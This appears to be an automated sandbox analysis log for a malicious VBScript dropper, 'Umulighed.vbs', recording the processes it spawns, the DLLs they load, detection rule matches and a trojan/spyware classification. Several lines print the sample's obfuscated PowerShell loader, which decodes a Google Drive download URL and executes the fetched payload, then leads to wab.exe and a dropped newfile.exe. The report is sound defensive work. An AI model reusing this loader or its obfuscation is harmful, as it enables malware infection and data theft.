Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B89CED6 1_2_00007FFD9B89CED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B89DC82 1_2_00007FFD9B89DC82
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0257E0E7 9_2_0257E0E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0257E758 9_2_0257E758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_02574AD0 9_2_02574AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_02573EB8 9_2_02573EB8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0257EFE8 9_2_0257EFE8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_02574200 9_2_02574200
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00621C5C 10_2_00621C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_006225D3 10_2_006225D3
Source: Umulighed.vbs Initial sample: Strings found which are bigger than 50
Source: amsi64_6912.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_6208.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6208, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@15/8@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Klapjagters.Sep Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arxcys0t.gux.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Command line argument: P^)u 10_2_00621C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Command line argument: WABOpen 10_2_00621C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Command line argument: 5b 10_2_00623530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6912
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6208
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
